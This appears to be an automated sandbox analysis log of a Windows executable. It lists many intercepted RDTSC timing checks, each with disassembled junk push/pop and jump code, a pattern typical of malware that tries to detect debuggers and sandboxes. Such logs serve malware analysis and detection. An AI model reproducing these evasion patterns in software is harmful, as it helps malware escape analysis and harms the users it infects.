              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3390 second address: 7A33AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F08C2E4B6h 0x00000008 jnc 00007F9F08C2E4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F9F08C2E4C0h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3650 second address: 7A3654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3654 second address: 7A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A7CC5 second address: 7A7CCA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A7CCA second address: 7A7CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AD0E1 second address: 7AD0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007F9F08C2F7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72BFD4 second address: 72BFE0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2E4BEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABCFD second address: 7ABD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9F08C2F7DDh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABD0F second address: 7ABD14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABD14 second address: 7ABD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE47 second address: 7ABE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE4D second address: 7ABE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F9F08C2F7E4h 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE6A second address: 7ABE70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4D4 second address: 7AC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2F7E4h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4ED second address: 7AC4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4F3 second address: 7AC4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4F9 second address: 7AC512 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC6C0 second address: 7AC6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F9F08C2F7D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC82E second address: 7AC848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9F08C2E4C1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC848 second address: 7AC855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC855 second address: 7AC875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F08C2E4C0h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jp 00007F9F08C2E4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC875 second address: 7AC886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007F9F08C2F7E0h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9B1 second address: 7AC9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2E4BDh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9DC second address: 7AC9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9E1 second address: 7AC9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9E8 second address: 7AC9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ACB58 second address: 7ACB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9F08C2E4C3h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72BFCA second address: 72BFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F08C2F7D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ACF72 second address: 7ACF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F9F08C2E4B6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8D1 second address: 7AB8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8D5 second address: 7AB8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8DB second address: 7AB8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8E1 second address: 7AB8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8E7 second address: 7AB8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8F5 second address: 7AB91C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F08C2E4B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9F08C2E4BAh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007F9F08C2E4B6h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B0E0F second address: 7B0E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B0E14 second address: 7B0E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8764 second address: 7B877B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2F7E2h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B877B second address: 7B87A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9F08C2E4BBh 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F9F08C2E4BCh 0x00000016 jl 00007F9F08C2E4B6h 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B87A0 second address: 7B87C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F9F08C2F7E9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B87C4 second address: 7B87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BA6 second address: 7B8BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BAA second address: 7B8BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BB5 second address: 7B8BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BB9 second address: 7B8BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B338 second address: 76B3AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9F08C2F7DFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F9F08C2F7D8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F9F08C2F7DAh 0x0000002b push ebx 0x0000002c add edi, 0D62B652h 0x00000032 pop edi 0x00000033 pop edi 0x00000034 push 00000004h 0x00000036 call 00007F9F08C2F7E1h 0x0000003b movsx edx, ax 0x0000003e pop ecx 0x0000003f adc dl, 00000013h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F9F08C2F7E3h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B905D second address: 7B9062 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B9062 second address: 7B9068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720446 second address: 720459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720459 second address: 72045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72045D second address: 720466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720466 second address: 72046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72046D second address: 720472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD063 second address: 7BD06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9F08C2F7D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD06D second address: 7BD07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F08C2E4BBh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD07E second address: 7BD082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD082 second address: 7BD088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD088 second address: 7BD0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F08C2F7E5h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD0A5 second address: 7BD0A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD0A9 second address: 7BD0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD204 second address: 7BD20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD20D second address: 7BD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1831 second address: 7C1837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 735F66 second address: 735F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1080 second address: 7C1095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1095 second address: 7C109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C109E second address: 7C10A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C1268 second address: 7C128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2F7DEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C154D second address: 7C1552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A38 second address: 7C8A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F08C2F7E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 jmp 00007F9F08C2F7E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007F9F08C2F7D6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A73 second address: 7C8A84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F9F08C2E4B6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8A84 second address: 7C8AA0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jno 00007F9F08C2F7D6h 0x0000000f jnc 00007F9F08C2F7D6h 0x00000015 js 00007F9F08C2F7D6h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6B9B second address: 7C6BA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6BA6 second address: 7C6BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C6FBA second address: 7C6FC4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2E4BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C756C second address: 7C7570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7570 second address: 7C757C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C757C second address: 7C7580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7580 second address: 7C758F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F08C2E4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C77EE second address: 7C77F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C77F4 second address: 7C7815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F08C2E4C9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7815 second address: 7C782D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7E32 second address: 7C7E73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9F08C2E4C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2E4C5h 0x00000010 push ecx 0x00000011 jmp 00007F9F08C2E4BAh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C7E73 second address: 7C7E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7C8493 second address: 7C84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F9F08C2E4CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 732BD1 second address: 732BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F9F08C2F7D8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 732BE2 second address: 732BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0B39 second address: 7D0B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9F08C2F7D6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0C99 second address: 7D0C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0C9F second address: 7D0CA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0CA7 second address: 7D0CB1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
